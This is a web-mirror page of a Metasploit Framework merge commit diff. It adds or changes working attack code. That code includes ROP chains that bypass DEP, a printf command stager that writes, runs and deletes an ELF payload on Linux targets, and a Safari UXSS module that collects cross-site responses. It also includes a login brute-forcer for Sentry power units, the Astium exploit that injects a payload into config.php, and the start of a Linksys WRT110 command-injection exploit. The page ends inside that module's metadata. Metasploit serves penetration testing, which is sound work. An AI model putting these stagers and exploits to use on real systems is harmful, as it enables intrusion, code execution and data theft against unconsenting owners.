infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into data_dir 

Conflicts:
	lib/msf/core/auxiliary/jtr.rb
bug/bundler_fix
Meatballs 2013-10-10 19:55:26 +01:00
parent c460f943f7 9b96351ba2
commit 9ca9b4ab29
No known key found for this signature in database
GPG Key ID: 5380EAF01F2F8B38
55 changed files with 1176 additions and 395 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

1
.mailmap
View File

@ -7,6 +7,7 @@ hmoore-r7 <hmoore-r7@github> HD Moore <hdm@digitaloffense.net>
jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt jlee-r7 <jlee-r7@github> egypt <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt jlee-r7 <jlee-r7@github> James Lee <egypt@metasploit.com> # aka egypt
jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com> jlee-r7 <jlee-r7@github> James Lee <James_Lee@rapid7.com>
joev-r7 <joev-r7@github> joev <joev@metasploit.com>
joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com> joev-r7 <joev-r7@github> Joe Vennix <Joe_Vennix@rapid7.com>
jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com> jvazquez-r7 <jvazquez-r7@github> jvazquez-r7 <juan.vazquez@metasploit.com>
limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com> limhoff-r7 <limhoff-r7@github> Luke Imhoff <luke_imhoff@rapid7.com>

BIN
data/meterpreter/ext_server_sniffer.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_sniffer.x86.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x64.dll
View File

Binary file not shown.

BIN
data/meterpreter/ext_server_stdapi.x86.dll
View File

Binary file not shown.

4
data/ropdb/hxds.xml
View File

@ -11,7 +11,7 @@
<gadget offset="0x0001803c">POP EBP # RETN</gadget> <gadget offset="0x0001803c">POP EBP # RETN</gadget>
<gadget offset="0x0001803c">skip 4 bytes</gadget> <gadget offset="0x0001803c">skip 4 bytes</gadget>
<gadget offset="0x0001750f">POP EBX # RETN</gadget> <gadget offset="0x0001750f">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget> <gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget> <gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x0004df88">NEG EAX # RETN</gadget> <gadget offset="0x0004df88">NEG EAX # RETN</gadget>
<gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget> <gadget offset="0x00005737">XCHG EAX, EBX # RETN</gadget>
@ -40,7 +40,7 @@
<gadget offset="0x0003e4fa">POP EBP # RETN</gadget> <gadget offset="0x0003e4fa">POP EBP # RETN</gadget>
<gadget offset="0x0003e4fa">skip 4 bytes</gadget> <gadget offset="0x0003e4fa">skip 4 bytes</gadget>
<gadget offset="0x0006a2b4">POP EBX # RETN</gadget> <gadget offset="0x0006a2b4">POP EBX # RETN</gadget>
<gadget value="fffffdff">0x00000201</gadget> <gadget value="safe_negate_size">Safe size to NEG</gadget>
<gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget> <gadget offset="0x00069351">XCHG EAX, EBX # RETN</gadget>
<gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget> <gadget offset="0x00025188">NEG EAX # POP ESI # RETN</gadget>
<gadget value="junk">JUNK</gadget> <gadget value="junk">JUNK</gadget>

2
data/ropdb/java.xml
View File

@ -9,7 +9,7 @@
<gadget offset="0x00024c66">POP EBP # RETN</gadget> <gadget offset="0x00024c66">POP EBP # RETN</gadget>
<gadget offset="0x00024c66">skip 4 bytes</gadget> <gadget offset="0x00024c66">skip 4 bytes</gadget>
<gadget offset="0x00004edc">POP EAX # RETN</gadget> <gadget offset="0x00004edc">POP EAX # RETN</gadget>
<gadget value="FFFFFBFF">0x00000201</gadget> <gadget value="safe_negate_size">0x00000201</gadget>
<gadget offset="0x00011e05">NEG EAX # RETN</gadget> <gadget offset="0x00011e05">NEG EAX # RETN</gadget>
<gadget offset="0x000136e3">POP EBX # RETN</gadget> <gadget offset="0x000136e3">POP EBX # RETN</gadget>
<gadget value="0xffffffff"></gadget> <gadget value="0xffffffff"></gadget>

53
data/ropdb/msvcrt.xml
View File

@ -7,12 +7,21 @@
</compatibility> </compatibility>
<gadgets base="0x77c10000"> <gadgets base="0x77c10000">
<gadget offset="0x0002b860">POP EAX # RETN</gadget>
<gadget value="safe_negate_size">0xFFFFFBFF -> ebx</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBP # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x0001362c">POP EBX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001e071">XCHG EAX, EBX # ADD BYTE [EAX], AL # RETN</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0xFFFFFFC0">0xFFFFFFC0-> edx</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0000be18">NEG EAX # POP EBX # RETN</gadget>
<gadget value="junk">JUNK</gadget>
<gadget offset="0x00048fbc">XCHG EAX, EDX # RETN</gadget>
<gadget offset="0x0002ee15">POP EBP # RETN</gadget> <gadget offset="0x0002ee15">POP EBP # RETN</gadget>
<gadget offset="0x0002ee15">skip 4 bytes</gadget> <gadget offset="0x0002ee15">skip 4 bytes</gadget>
<gadget offset="0x0003fa1c">POP EBX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget>
<gadget offset="0x00040d13">POP EDX # RETN</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget>
<gadget offset="0x0002eeef">POP ECX # RETN</gadget> <gadget offset="0x0002eeef">POP ECX # RETN</gadget>
<gadget offset="0x0004d9bb">Writable location</gadget> <gadget offset="0x0004d9bb">Writable location</gadget>
<gadget offset="0x0001a88c">POP EDI # RETN</gadget> <gadget offset="0x0001a88c">POP EDI # RETN</gadget>
@ -33,23 +42,29 @@
</compatibility> </compatibility>
<gadgets base="0x77ba0000"> <gadgets base="0x77ba0000">
<gadget offset="0x0003eebf">POP EAX # RETN</gadget> <gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget offset="0x00001114">ptr to VirtualProtect()</gadget> <gadget offset="0x00001114">VirtualProtect()</gadget>
<gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget> <gadget offset="0x0001f244">MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN</gadget>
<gadget value="junk">Filler</gadget> <gadget value="junk">JUNK</gadget>
<gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget> <gadget offset="0x00010c86">XCHG EAX,ESI # RETN</gadget>
<gadget offset="0x00026320">POP EBP # RETN</gadget> <gadget offset="0x00029801">POP EBP # RETN</gadget>
<gadget offset="0x00042265">PUSH ESP # RETN</gadget> <gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
<gadget offset="0x000385b7">POP EBX # RETN</gadget> <gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget> <gadget value="0x03C0990F">EAX</gadget>
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget> <gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget> <gadget offset="0x000148d3">POP EBX, RET</gadget>
<gadget offset="0x000330fb">POP ECX # RETN</gadget> <gadget offset="0x000521e0">.data</gadget>
<gadget offset="0x0004ff56">Writable location</gadget> <gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
<gadget offset="0x00038a92">POP EDI # RETN</gadget> <gadget offset="0x0001fc02">POP ECX # RETN</gadget>
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget> <gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
<gadget offset="0x0003eebf">POP EAX # RETN</gadget> <gadget offset="0x00038c04">POP EDI # RETN</gadget>
<gadget value="nop">nop</gadget> <gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0944F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="nop">NOP</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget> <gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets> </gadgets>
</rop> </rop>

80
lib/msf/core/auxiliary/jtr.rb
View File

@ -37,45 +37,57 @@ module Auxiliary::JohnTheRipper
autodetect_platform autodetect_platform
end end
# @return [String] the run path instance variable if the platform is detectable, nil otherwise.
def autodetect_platform def autodetect_platform
cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
return @run_path if @run_path return @run_path if @run_path
cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
if File.directory?(cpuinfo_base)
data = nil
case ::RUBY_PLATFORM case ::RUBY_PLATFORM
when /mingw|cygwin|mswin/ when /mingw|cygwin|mswin/
data = `"#{cpuinfo_base}/cpuinfo.exe"` rescue nil fname = "#{cpuinfo_base}/cpuinfo.exe"
case data if File.exists?(fname) and File.executable?(fname)
when /sse2/ data = %x{"#{fname}"} rescue nil
@run_path ||= "run.win32.sse2/john.exe" end
when /mmx/ case data
@run_path ||= "run.win32.mmx/john.exe" when /sse2/
else @run_path ||= "run.win32.sse2/john.exe"
@run_path ||= "run.win32.any/john.exe" when /mmx/
end @run_path ||= "run.win32.mmx/john.exe"
else
when /x86_64-linux/ @run_path ||= "run.win32.any/john.exe"
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia64.bin") rescue nil end
data = `#{cpuinfo_base}/cpuinfo.ia64.bin` rescue nil when /x86_64-linux/
case data fname = "#{cpuinfo_base}/cpuinfo.ia64.bin"
when /mmx/ if File.exists? fname
@run_path ||= "run.linux.x64.mmx/john" ::FileUtils.chmod(0755, fname) rescue nil
else data = %x{"#{fname}"} rescue nil
@run_path ||= "run.linux.x86.any/john" end
end case data
when /mmx/
when /i[\d]86-linux/ @run_path ||= "run.linux.x64.mmx/john"
::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia32.bin") rescue nil else
data = `#{cpuinfo_base}/cpuinfo.ia32.bin` rescue nil @run_path ||= "run.linux.x86.any/john"
case data end
when /sse2/ when /i[\d]86-linux/
@run_path ||= "run.linux.x86.sse2/john" fname = "#{cpuinfo_base}/cpuinfo.ia32.bin"
when /mmx/ if File.exists? fname
@run_path ||= "run.linux.x86.mmx/john" ::FileUtils.chmod(0755, fname) rescue nil
else data = %x{"#{fname}"} rescue nil
@run_path ||= "run.linux.x86.any/john" end
case data
when /sse2/
@run_path ||= "run.linux.x86.sse2/john"
when /mmx/
@run_path ||= "run.linux.x86.mmx/john"
else
@run_path ||= "run.linux.x86.any/john"
end
end end
end end
@run_path
return @run_path
end end
def john_session_id def john_session_id

27
lib/msf/core/exploit/cmdstager_printf.rb Executable file
View File

@ -0,0 +1,27 @@
# -*- coding: binary -*-
require 'msf/core/exploit/cmdstager'
module Msf
####
# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
#
# This stager uses a POSIX-conformant printf, that supports the interpretation
# of octal escapes, to drop an ELF with the payload embedded to disk.
####
module Exploit::CmdStagerPrintf
include Msf::Exploit::CmdStager
# Initializes a CmdStagerPrintf instance for the supplied payload
#
# @param exe [String] The payload embedded into an ELF
# @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
def create_stager(exe)
Rex::Exploitation::CmdStagerPrintf.new(exe)
end
end
end

1
lib/msf/core/exploit/mixins.rb
View File

@ -26,6 +26,7 @@ require 'msf/core/exploit/cmdstager_debug_asm'
require 'msf/core/exploit/cmdstager_tftp' require 'msf/core/exploit/cmdstager_tftp'
require 'msf/core/exploit/cmdstager_bourne' require 'msf/core/exploit/cmdstager_bourne'
require 'msf/core/exploit/cmdstager_echo' require 'msf/core/exploit/cmdstager_echo'
require 'msf/core/exploit/cmdstager_printf'
# Protocol # Protocol
require 'msf/core/exploit/tcp' require 'msf/core/exploit/tcp'

3
lib/msf/core/module/author.rb
View File

@ -44,7 +44,8 @@ class Msf::Module::Author
'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com', 'Carlos Perez' => 'carlos_perez' + 0x40.chr + 'darkoperator.com',
'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com', 'juan vazquez' => 'juan.vazquez' + 0x40.chr + 'metasploit.com',
'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com', 'theLightCosine' => 'theLightCosine' + 0x40.chr + 'metasploit.com',
'mubix' => 'mubix' + 0x40.chr + 'hak5.org' 'mubix' => 'mubix' + 0x40.chr + 'hak5.org',
'joev' => 'joev' + 0x40.chr + 'metasploit.com'
} }
# #

1
lib/rex/exploitation/cmdstager.rb
View File

@ -7,3 +7,4 @@ require 'rex/exploitation/cmdstager/debug_asm'
require 'rex/exploitation/cmdstager/tftp' require 'rex/exploitation/cmdstager/tftp'
require 'rex/exploitation/cmdstager/bourne' require 'rex/exploitation/cmdstager/bourne'
require 'rex/exploitation/cmdstager/echo' require 'rex/exploitation/cmdstager/echo'
require 'rex/exploitation/cmdstager/printf'

122
lib/rex/exploitation/cmdstager/printf.rb Executable file
View File

@ -0,0 +1,122 @@
# -*- coding: binary -*-
require 'rex/text'
require 'rex/arch'
require 'msf/core/framework'
require 'shellwords'
module Rex
module Exploitation
class CmdStagerPrintf < CmdStagerBase
def initialize(exe)
super
@var_elf = Rex::Text.rand_text_alpha(5)
end
#
# Override to ensure opts[:temp] is a correct *nix path
#
def generate(opts = {})
opts[:temp] = opts[:temp] || '/tmp/'
opts[:temp].gsub!(/\\/, '/')
opts[:temp] = opts[:temp].shellescape
opts[:temp] << '/' if opts[:temp][-1,1] != '/'
super
end
#
# Override to set the extra byte count
#
def generate_cmds(opts)
if opts[:noquotes]
@cmd_start = "printf "
@cmd_end = ">>#{@tempdir}#{@var_elf}"
@prefix = '\\\\'
min_part_size = 5
else
@cmd_start = "printf '"
@cmd_end = "'>>#{@tempdir}#{@var_elf}"
@prefix = '\\'
min_part_size = 4
end
xtra_len = @cmd_start.length + @cmd_end.length
opts.merge!({ :extra => xtra_len })
if (opts[:linemax] - opts[:extra]) < min_part_size
raise RuntimeError, "Not enough space for command - #{opts[:extra] + min_part_size} byte required, #{opts[:linemax]} byte available"
end
super
end
#
# Encode into a "\12\345" octal format that printf understands
#
def encode_payload(opts)
return Rex::Text.to_octal(@exe, @prefix)
end
#
# Override it to ensure that the octal representation of a byte isn't cut
#
def slice_up_payload(encoded, opts)
encoded_dup = encoded.dup
parts = []
xtra_len = opts[:extra]
xtra_len ||= 0
while (encoded_dup.length > 0)
temp = encoded_dup.slice(0, (opts[:linemax] - xtra_len))
# remove the last octal escape if it is imcomplete
if encoded_dup.length > temp.length and encoded_dup[temp.length, @prefix.length] != @prefix
pos = temp.rindex('\\')
pos -= 1 if temp[pos-1] == '\\'
temp.slice!(pos..temp.length-1)
end
parts << temp
encoded_dup.slice!(0, temp.length)
end
parts
end
#
# Combine the parts of the encoded file with the stuff that goes
# before and after it.
#
def parts_to_commands(parts, opts)
parts.map do |p|
@cmd_start + p + @cmd_end
end
end
#
# Since the binary has been already dropped to disk, just execute and
# delete it
#
def generate_cmds_decoder(opts)
cmds = []
# Make it all happen
cmds << "chmod +x #{@tempdir}#{@var_elf}"
cmds << "#{@tempdir}#{@var_elf}"
# Clean up after unless requested not to..
unless opts[:nodelete]
cmds << "rm -f #{@tempdir}#{@var_elf}"
end
return cmds
end
def cmd_concat_operator
" ; "
end
end
end
end

38
lib/rex/exploitation/ropdb.rb
View File

@ -29,7 +29,7 @@ class RopDb
# #
# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or # Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
# some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size, # some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size,
# and :size_negate. # :unsafe_negate_size, and :safe_negate_size
# Note if no RoP is found, it returns an empry array. # Note if no RoP is found, it returns an empry array.
# Arguments: # Arguments:
# rop_name - name of the ROP chain. # rop_name - name of the ROP chain.
@ -90,8 +90,10 @@ class RopDb
Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
elsif e == :size elsif e == :size
payload.length payload.length
elsif e == :size_negate elsif e == :unsafe_negate_size
0xffffffff - payload.length + 1 get_unsafe_size(payload.length)
elsif e == :safe_negate_size
get_safe_size(payload.length)
else else
e e
end end
@ -105,6 +107,28 @@ class RopDb
private private
#
# Returns a size that's safe from null bytes.
# This function will keep incrementing the value of "s" until it's safe from null bytes.
#
def get_safe_size(s)
safe_size = get_unsafe_size(s)
while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
safe_size -= 1
end
safe_size
end
#
# Returns a size that might contain one or more null bytes
#
def get_unsafe_size(s)
0xffffffff - s + 1
end
# #
# Checks if a ROP chain is compatible # Checks if a ROP chain is compatible
# #
@ -146,8 +170,10 @@ class RopDb
gadgets << :junk gadgets << :junk
when 'size' when 'size'
gadgets << :size gadgets << :size
when 'size_negate' when 'unsafe_negate_size'
gadgets << :size_negate gadgets << :unsafe_negate_size
when 'safe_negate_size'
gadgets << :safe_negate_size
else else
gadgets << value.to_i(16) gadgets << value.to_i(16)
end end
@ -160,4 +186,4 @@ class RopDb
end end
end end
end end

17
lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb
View File

@ -42,10 +42,13 @@ class MultiCaller
include DLLHelper include DLLHelper
def initialize( client, parent ) def initialize( client, parent, win_consts )
@parent = parent @parent = parent
@client = client @client = client
# needed by DLL helper
@win_consts = win_consts
if( @client.platform =~ /x64/i ) if( @client.platform =~ /x64/i )
@native = 'Q' @native = 'Q'
else else
@ -224,9 +227,17 @@ class MultiCaller
rec_out_only_buffers = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_BUFFERBLOB_OUT) rec_out_only_buffers = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_BUFFERBLOB_OUT)
rec_return_value = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_RET) rec_return_value = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_RET)
rec_last_error = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_ERR) rec_last_error = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_ERR)
rec_err_msg = response.get_tlv_value(TLV_TYPE_RAILGUN_BACK_MSG)
# Error messages come back with trailing CRLF, so strip it out
# if we do get a message.
rec_err_msg.strip! if not rec_err_msg.nil?
# The hash the function returns # The hash the function returns
return_hash={"GetLastError" => rec_last_error} return_hash = {
"GetLastError" => rec_last_error,
"ErrorMessage" => rec_err_msg
}
#process return value #process return value
case function.return_type case function.return_type
@ -303,8 +314,6 @@ class MultiCaller
protected protected
attr_accessor :win_consts
end # MultiCall end # MultiCall
end; end; end; end; end; end end; end; end; end; end; end

2
lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb
View File

@ -290,7 +290,7 @@ class Railgun
# #
def multi(functions) def multi(functions)
if @multicaller.nil? if @multicaller.nil?
@multicaller = MultiCaller.new(client, self) @multicaller = MultiCaller.new(client, self, ApiConstants.manager)
end end
return @multicaller.call(functions) return @multicaller.call(functions)

42
modules/auxiliary/gather/apple_safari_webarchive_uxss.rb
View File

@ -12,6 +12,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::FILEFORMAT include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
# [Array<Array<Hash>>] list of poisonable scripts per user-specified URLS # [Array<Array<Hash>>] list of poisonable scripts per user-specified URLS
attr_accessor :scripts_to_poison attr_accessor :scripts_to_poison
@ -177,17 +178,39 @@ class Metasploit3 < Msf::Auxiliary
def on_request_uri(cli, request) def on_request_uri(cli, request)
begin begin
data = if request.body.size > 0 data_str = if request.body.size > 0
request.body request.body
else else
request.qstring['data'] request.qstring['data']
end end
data = JSON::parse(data || '') data = JSON::parse(data_str || '')
print_status "Received data: #{data}" file = record_data(data, cli)
rescue # json error, dismiss request & keep crit. server up send_response_html(cli, '')
print_good "#{data_str.length} chars received and stored to #{file}"
rescue JSON::ParserError => e # json error, dismiss request & keep crit. server up
print_error "Invalid JSON received: #{data_str}"
send_not_found(cli)
end end
end end
# @param [Hash] data the data to store in the log
# @return [String] filename where we are storing the data
def record_data(data, cli)
@client_cache ||= Hash.new({})
@client_cache[cli.peerhost]['file'] ||= store_loot(
"safari.client", "text/plain", cli.peerhost, '', "safari_webarchive", "Webarchive Collected Data"
)
file = @client_cache[cli.peerhost]['file']
@client_cache[cli.peerhost]['data'] ||= []
@client_cache[cli.peerhost]['data'].push(data)
data_str = JSON.generate(@client_cache[cli.peerhost]['data'])
File.write(file, data_str)
file
end
### ASSEMBLE THE WEBARCHIVE XML ### ### ASSEMBLE THE WEBARCHIVE XML ###
# @return [String] contents of webarchive as an XML document # @return [String] contents of webarchive as an XML document
@ -531,9 +554,11 @@ class Metasploit3 < Msf::Auxiliary
var sent = false; var sent = false;
req.open('GET', '#{url}', true); req.open('GET', '#{url}', true);
req.onreadystatechange = function() { req.onreadystatechange = function() {
if (!sent) { if (req.readyState==4 && !sent) {
sendData('response_headers', req.getAllResponseHeaders()); sendData('#{url}', {
sendData('response_body', req.responseText); response_headers: req.getAllResponseHeaders(),
response_body: req.responseText
});
sent = true; sent = true;
} }
}; };
@ -647,8 +672,7 @@ class Metasploit3 < Msf::Auxiliary
%Q| %Q|
window.sendData = function(key, val) { window.sendData = function(key, val) {
var data = {}; var data = {};
if (key && val) data[key] = val; data[key] = val;
if (!val) data = key;
window.top.postMessage(JSON.stringify(data), "*") window.top.postMessage(JSON.stringify(data), "*")
}; };
| |

2
modules/auxiliary/gather/coldfusion_pwd_props.rb
View File

@ -168,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
out, filename = fingerprint(res) out, filename = fingerprint(res)
print_status("#{peer} #{out}") if out print_status("#{peer} #{out}") if out
if(out =~ /Not Vulnerable/) if(out =~ /Not Vulnerable/)
print_status("#{peer} isn't vulnerable to this attack") print_status("#{peer} isn't vulnerable to this attack")
return return
end end

3
modules/auxiliary/gather/dns_info.rb
View File

@ -124,6 +124,7 @@ class Metasploit3 < Msf::Auxiliary
query = @res.search(host, "A") query = @res.search(host, "A")
if query if query
query.answer.each do |rr| query.answer.each do |rr|
next unless rr.type == "A"
record = {} record = {}
record[:host] = host record[:host] = host
record[:type] = "A" record[:type] = "A"
@ -134,6 +135,7 @@ class Metasploit3 < Msf::Auxiliary
query1 = @res.search(host, "AAAA") query1 = @res.search(host, "AAAA")
if query1 if query1
query1.answer.each do |rr| query1.answer.each do |rr|
next unless rr.type == "AAAA"
record = {} record = {}
record[:host] = host record[:host] = host
record[:type] = "AAAA" record[:type] = "AAAA"
@ -189,6 +191,7 @@ class Metasploit3 < Msf::Auxiliary
query = @res.query(target, "TXT") query = @res.query(target, "TXT")
return results if not query return results if not query
query.answer.each do |rr| query.answer.each do |rr|
next unless rr.type == "TXT"
record = {} record = {}
record[:host] = target record[:host] = target
record[:text] = rr.txt record[:text] = rr.txt

2
modules/auxiliary/scanner/http/ektron_cms400net.rb
View File

@ -60,7 +60,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def gen_blank_passwords(users, credentials) def gen_blank_passwords(users, credentials)
return credentials return credentials
end end
def run_host(ip) def run_host(ip)

112
modules/auxiliary/scanner/http/sentry_cdu_enum.rb Normal file
View File

@ -0,0 +1,112 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Sentry Switched CDU Bruteforce Login Utility',
'Description' => %{
This module scans for ServerTech's Sentry Switched CDU (Cabinet Power
Distribution Unit) web login portals, and performs login brute force
to identify valid credentials.
},
'Author' =>
[
'Karn Ganeshen <KarnGaneshen[at]gmail.com>',
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('USERNAME', [true, "A specific username to authenticate as, default 'admn'", "admn"]),
OptString.new('PASSWORD', [true, "A specific password to authenticate with, deault 'admn'", "admn"])
], self.class)
end
def run_host(ip)
unless is_app_sentry?
print_error("#{rhost}:#{rport} - Sentry Switched CDU not found. Module will not continue.")
return
end
print_status("#{rhost}:#{rport} - Starting login brute force...")
each_user_pass do |user, pass|
do_login(user, pass)
end
end
#
# What's the point of running this module if the app actually isn't Sentry
#
def is_app_sentry?
begin
res = send_request_cgi(
{
'uri' => '/',
'method' => 'GET'
})
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError
return false
end
if (res and res.body.include?("Sentry Switched CDU"))
vprint_good("#{rhost}:#{rport} - Running ServerTech Sentry Switched CDU")
return true
else
return false
end
end
#
# Brute-force the login page
#
def do_login(user, pass)
vprint_status("#{rhost}:#{rport} - Trying username:#{user.inspect} with password:#{pass.inspect}")
begin
res = send_request_cgi(
{
'uri' => '/index.html',
'method' => 'GET',
'authorization' => basic_auth(user,pass)
})
if (res and res.headers['Set-Cookie'])
print_good("#{rhost}:#{rport} - SUCCESSFUL LOGIN - #{user.inspect}:#{pass.inspect}")
report_hash = {
:host => rhost,
:port => rport,
:sname => 'ServerTech Sentry Switched CDU',
:user => user,
:pass => pass,
:active => true,
:type => 'password'
}
report_auth_info(report_hash)
return :next_user
else
vprint_error("#{rhost}:#{rport} - FAILED LOGIN - #{user.inspect}:#{pass.inspect}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Rex::ConnectionError, ::Errno::EPIPE
print_error("#{rhost}:#{rport} - HTTP Connection Failed, Aborting")
return :abort
end
end
end

9
modules/auxiliary/scanner/smb/smb_login.rb
View File

@ -39,9 +39,14 @@ class Metasploit3 < Msf::Auxiliary
'References' => 'References' =>
[ [
[ 'CVE', '1999-0506'], # Weak password [ 'CVE', '1999-0506'], # Weak password
], ],
'License' => MSF_LICENSE 'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'DB_ALL_CREDS' => false,
'BLANK_PASSWORDS' => false,
'USER_AS_PASS' => false
}
) )
deregister_options('RHOST','USERNAME','PASSWORD') deregister_options('RHOST','USERNAME','PASSWORD')

4
modules/exploits/linux/http/astium_sqli_upload.rb
View File

@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote
phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');" phppayload << "$orig = file_get_contents('/usr/local/astium/web/php/config.php');"
# Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root, # Add the payload to the end of "/usr/local/astium/web/php/config.php". Also do a check if we are root,
# else during the config reload it might happen that an extra shell is spawned as the apache user. # else during the config reload it might happen that an extra shell is spawned as the apache user.
phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");" phppayload << "$replacement = base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\");"
phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');" phppayload << "$f = fopen('/usr/local/astium/web/php/config.php', 'w');"
phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");" phppayload << "fwrite($f, $orig . \"<?php if (posix_getuid() == 0) {\" . $replacement . \"} ?>\");"
phppayload << "fclose($f);" phppayload << "fclose($f);"
@ -182,7 +182,7 @@ class Metasploit3 < Msf::Exploit::Remote
}, 120) }, 120)
# If we don't get a 200 when we request our malicious payload, we suspect # If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either. # we don't have a shell, either.
if res and res.code != 200 if res and res.code != 200
print_error("#{peer} - Unexpected response...") print_error("#{peer} - Unexpected response...")
end end

121
modules/exploits/linux/http/linksys_wrt110_cmd_exec.rb Normal file
View File

@ -0,0 +1,121 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStagerEcho
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WRT110 Remote Command Execution',
'Description' => %q{
The Linksys WRT110 consumer router is vulnerable to a command injection
exploit in the ping field of the web interface.
},
'Author' =>
[
'Craig Young', # Vulnerability discovery
'joev', # msf module
'juan vazquez' # module help + echo cmd stager
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2013-3568'],
['BID', '61151'],
['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
],
